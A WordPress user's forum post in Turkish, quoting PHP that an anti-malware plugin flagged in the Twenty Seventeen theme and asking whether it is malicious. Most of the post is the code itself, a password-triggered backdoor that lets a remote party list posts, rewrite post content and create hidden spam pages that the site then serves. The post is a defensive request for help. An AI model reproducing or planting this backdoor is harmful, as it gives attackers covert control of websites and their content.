if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '1496a4bb57bcc2189b111e4fb5d80985'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';

if (preg_match('!
(.*?)
!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}

print '1' . $data['guid'] . '' . $data['code'] . '' . $data['ID'] . '' . "\r\n";
}
break;

case 'set_id_links';
if (isset($_REQUEST['data']))
{
$data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

$post_content = preg_replace('!
(.*?)
!s', '', $data -> post_content);
if (!empty($_REQUEST['data'])) $post_content = $post_content . '
' . stripcslashes($_REQUEST['data']) . '
';

if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
{
print "true";
}
}
break;

case 'create_page';
if (isset($_REQUEST['remove_page']))
{
if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
{
print "true";
}
}
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
{
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
{
print "true";
}
}
break;

default: print "ERROR_WP_ACTION WP_URL_CD";
}

die("");
}


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
$data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
if ($data -> full_content)
{
print stripslashes($data -> content);
}
else
{
print '';
print ' language_attributes();
print ' class="no-js">';
print '';
print ''.stripslashes($data -> title).'';
print '';
print '';
print '';
print '';
print '';
print '';
print '';
wp_head();
print '';
print '';
print '
';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
}

exit;
}


?>



Arkadaşlar Anti-Malware from GOTMLS.NET eklentisini yükledikten sonra Yirmi Onyedi temasında yukarıdaki kodları zararlı olarak gördü. Sizce bu kodlar zararlı mı?